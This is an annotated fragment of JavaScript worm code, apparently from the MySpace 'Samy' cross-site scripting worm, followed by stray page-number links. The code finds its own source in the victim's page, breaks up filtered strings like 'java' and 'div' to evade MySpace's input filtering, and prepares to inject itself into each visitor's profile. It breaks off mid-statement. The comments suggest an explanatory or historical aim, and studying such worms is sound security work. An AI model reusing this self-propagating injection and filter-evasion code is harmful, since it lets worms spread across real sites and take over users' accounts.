// I.e. all of the code you are reading now. The code will then be inserted
// into the victim's page so that so that people who visit a victim's page
// will also become a victim.
var htmlBody = getHtmlBody();
// Mark the beginning of the script injection and attack code.
var myCodeBlockIndex = htmlBody.indexOf('m' + 'ycode');
var myRoughCodeBlock = htmlBody.substring( myCodeBlockIndex,
myCodeBlockIndex + 4096);
var myCodeBlockEndIndex = myRoughCodeBlock.indexOf('d' + 'iv');
// Mark the ending of the script injection and attack code.
// myCodeBlock ends with "// "div>" when creating the "heroCommentWithWorm" variable.
var myCodeBlock = myRoughCodeBlock.substring(0, myCodeBlockEndIndex);
// This variable is populated with the worm code that is placed into the
// victim's page so that anyone visiting the victim's page will become
// victim's themselves.
var heroCommentWithWorm;
if (myCodeBlock) {
// Apparently, MySpace dissallowed user input with strings like
// "java", "div", and "expr". That is why those string are broken
// below.
myCodeBlock = myCodeBlock.replace('jav' + 'a', singleQuote + 'jav' + 'a');
myCodeBlock = myCodeBlock.
Pages:
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143